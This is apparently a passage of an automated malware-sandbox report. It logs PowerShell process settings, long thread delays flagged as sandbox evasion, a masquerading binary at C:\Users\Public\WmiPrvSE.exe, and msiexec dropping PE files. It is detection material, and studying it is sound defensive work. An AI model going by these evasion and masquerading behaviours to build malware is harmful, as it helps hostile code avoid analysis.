                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0077585423_2_00775854
                Source: C:\Users\Public\WmiPrvSE.exeCode function: 23_2_0076FA1C23_2_0076FA1C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899796Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899669Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899859
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899695
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899577
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899465
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899343
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899234
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899124
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899009
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898765
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898640
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898522
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898406
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898294
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898136
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898001
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897843
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897718
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897600
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897484
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897374
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897261
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897149
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897043
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896922
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896812
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896702
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896593
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896482
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896374
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896265
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896134
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899874
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899762
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899640
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899531
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899421
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899306
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899201
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899093
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898984
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898869
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898758
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898654
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898491
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898354
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898248
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898131
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898015
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897897
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897795
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897684
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897578
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897448
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897340
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897233
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897112
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896779
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896671
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896562
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896432
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899889
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899781
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899665
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899561
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899453
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899344
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899219
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 899109
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898997
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898850
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898714
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898576
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898466
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898359
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898242
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898125
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 898015
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897902
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897795
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897672
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897563
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897453
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897343
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897234
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897105
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 897000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896890
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 896770
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5726Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3884Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5797Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 987Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4162Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1016Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5060
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1347
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7253
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1393
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5906
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1752
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8199
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1208
                Source: C:\Users\Public\WmiPrvSE.exeWindow / User API: threadDelayed 1847
                Source: C:\Users\Public\WmiPrvSE.exeWindow / User API: threadDelayed 8069
                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4080.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI40EF.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI4020.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI44AA.tmpJump to dropped file
                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI40BF.tmpJump to dropped file
